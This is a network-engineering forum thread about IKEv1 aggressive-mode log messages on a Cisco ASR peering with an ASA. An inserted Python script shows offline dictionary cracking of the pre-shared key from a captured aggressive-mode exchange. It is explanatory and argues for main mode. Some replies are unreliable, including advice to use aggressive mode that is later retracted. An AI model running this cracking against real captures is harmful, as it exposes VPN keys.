So I disabled VPN aggressive mode on the ASR router; only main mode is allowed. I have no idea how the ASA is configured. The site-2-site VPN is working fine "most of the time". Sometimes, application folks report that network 192.168.1.0/24 cannot communicate with network 10.0.1.0/24.
When the VPN tunnel is not working I am seeing this in the ASR log:
000927: Jan 8 02:47:20.535 gmt: %CRYPTO-5-IKMP_AG_MODE_DISABLED: Unable to initiate or respond to Aggressive Mode while disabled
000928: Jan 8 05:33:24.726 gmt: %CRYPTO-5-IKMP_AG_MODE_DISABLED: Unable to initiate or respond to Aggressive Mode while disabled
000929: Jan 8 10:04:25.026 gmt: %CRYPTO-5-IKMP_AG_MODE_DISABLED: Unable to initiate or respond to Aggressive Mode while disabled
000930: Jan 8 11:12:55.819 gmt: %CRYPTO-5-IKMP_AG_MODE_DISABLED: Unable to initiate or respond to Aggressive Mode while disabled
I know Aggressive Mode on the ASA can be turned off with "crypto isakmp am-disable", but I do not control the ASA.
Does this mean that the ASA, by default, enables Aggressive Mode? Without turning it off, will it cause issues with my site-2-site VPN because the ASR does not allow aggressive mode?
Yes, by default the ASA uses aggressive mode, and you have to have the same mode on both ends.
I would recommend using aggressive mode, unless you're going to use certificate-based authentication. I had that problem with a remote VPN where I couldn't disable aggressive mode on the ASA.
Disabling aggressive mode prevents Cisco VPN clients from using preshared key authentication to establish tunnels to the security appliance. However, they may use certificate-based authentication (that is, ASA or RSA) to establish tunnels.
1- I am not using remote access VPN (VPN clients), so I don't care about this.
2- I am not sure where you've been the past five years, but using Aggressive Mode is NOT recommended. There are "known" vulnerabilities with Aggressive Mode. This is well documented. That's why Main Mode is the recommended approach (3 packets for AM versus 6 packets for MM).
Am I wrong? I thought Aggressive Mode is the thing of the past especially when it comes to site-2-site VPN.
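To make the "known vulnerabilities" concrete, here is an added example (not code from the thread, from Cisco, or from the poster) that reproduces the well-documented weakness of IKEv1 aggressive mode with pre-shared keys. In aggressive mode the responder's authentication hash HASH_R is sent unencrypted in message 2, and every other input to it (nonces, DH public values, cookies, the SA payload and the responder ID) is also on the wire, so anyone who captured the exchange can test candidate PSKs offline. In main mode the same hashes are only sent inside the encrypted messages 5 and 6, so there is nothing to attack offline. The code follows the RFC 2409 formulas; it assumes a policy that negotiated SHA-1 (so the prf is HMAC-SHA1) and group 2 (1024-bit DH values), and the cookies, nonces, DH values, SA payload body, PSK and identity are all constructed placeholders.

```python
"""IKEv1 aggressive mode with a pre-shared key: offline PSK recovery from a
passive capture.  Constructed example, not from the original thread.

RFC 2409 section 5.4 defines, for pre-shared-key authentication,
    SKEYID = prf(pre-shared-key, Ni_b | Nr_b)
and section 5 defines the responder's authentication hash
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b).
In aggressive mode HASH_R travels in the clear in message 2, and every other
input to it is also on the wire, so the PSK is the only unknown.
"""
import hashlib
import hmac
import os
from dataclasses import dataclass, replace
from typing import Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1 prf for a policy that negotiated SHA-1: HMAC-SHA1 (assumption)."""
    return hmac.new(key, data, hashlib.sha1).digest()


@dataclass(frozen=True)
class AggressiveModeCapture:
    """What a passive observer sees in aggressive-mode messages 1 and 2."""
    cky_i: bytes    # initiator cookie, ISAKMP header of message 1
    cky_r: bytes    # responder cookie, ISAKMP header of message 2
    sai_b: bytes    # body of the initiator's SA payload, message 1
    gxi: bytes      # initiator's Diffie-Hellman public value (KE), message 1
    gxr: bytes      # responder's Diffie-Hellman public value (KE), message 2
    ni_b: bytes     # initiator nonce body, message 1
    nr_b: bytes     # responder nonce body, message 2
    idir_b: bytes   # responder identity payload body, message 2
    hash_r: bytes   # HASH_R as sent by the responder, unencrypted, message 2


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """SKEYID for pre-shared-key authentication (RFC 2409 section 5.4)."""
    return prf(psk, ni_b + nr_b)


def compute_hash_r(psk: bytes, cap: AggressiveModeCapture) -> bytes:
    """Recompute HASH_R for a candidate PSK from the captured fields (RFC 2409 section 5)."""
    skeyid = skeyid_psk(psk, cap.ni_b, cap.nr_b)
    return prf(skeyid, cap.gxr + cap.gxi + cap.cky_r + cap.cky_i + cap.sai_b + cap.idir_b)


def simulate_aggressive_exchange(psk: bytes, idir_b: bytes) -> AggressiveModeCapture:
    """Play the responder side of aggressive mode and return what an eavesdropper
    captures.  Cookies, nonces and DH values are random placeholders of realistic
    size (128-byte values for a 1024-bit group); the SA payload body is a
    constructed stand-in, since only its raw bytes enter HASH_R."""
    cky_i, cky_r = os.urandom(8), os.urandom(8)
    ni_b, nr_b = os.urandom(20), os.urandom(20)
    gxi, gxr = os.urandom(128), os.urandom(128)
    sai_b = b"\x00\x00\x00\x01" + os.urandom(52)        # constructed SA body
    cap = AggressiveModeCapture(cky_i, cky_r, sai_b, gxi, gxr, ni_b, nr_b, idir_b, b"")
    # The responder computes HASH_R with the real PSK and sends it in message 2.
    return replace(cap, hash_r=compute_hash_r(psk, cap))


def crack_psk(cap: AggressiveModeCapture, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: return the first candidate whose recomputed HASH_R
    matches the captured one, or None.  Nothing is sent to either VPN peer."""
    for psk in candidates:
        if hmac.compare_digest(compute_hash_r(psk, cap), cap.hash_r):
            return psk
    return None


if __name__ == "__main__":
    # Hypothetical PSK and responder identity, chosen for the demonstration only.
    capture = simulate_aggressive_exchange(b"cisco123", b"vpn.example.net")
    wordlist = [b"password", b"Cisco123", b"cisco123", b"letmein"]
    print("recovered PSK:", crack_psk(capture, wordlist))   # → b'cisco123'
```

The loop in `crack_psk` is the same check that tools such as ike-scan's `psk-crack` run against a real capture; the only cost per guess is two HMAC operations, which is why a PSK that is not long and random does not survive aggressive mode. A main-mode exchange gives an attacker no unencrypted hash to feed into this loop, which is the practical reason to insist on main mode (or certificate authentication) for a site-to-site tunnel.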
I know Aggressive Mode is less secure and I know the difference between them. The reason I was recommending this was the preshared authentication issue, which looks like it doesn't apply for L2L VPN, just for the remote one. My mistake.
If that's the case then you just need to (or rather get the other company to) change the mode on the ASA to main.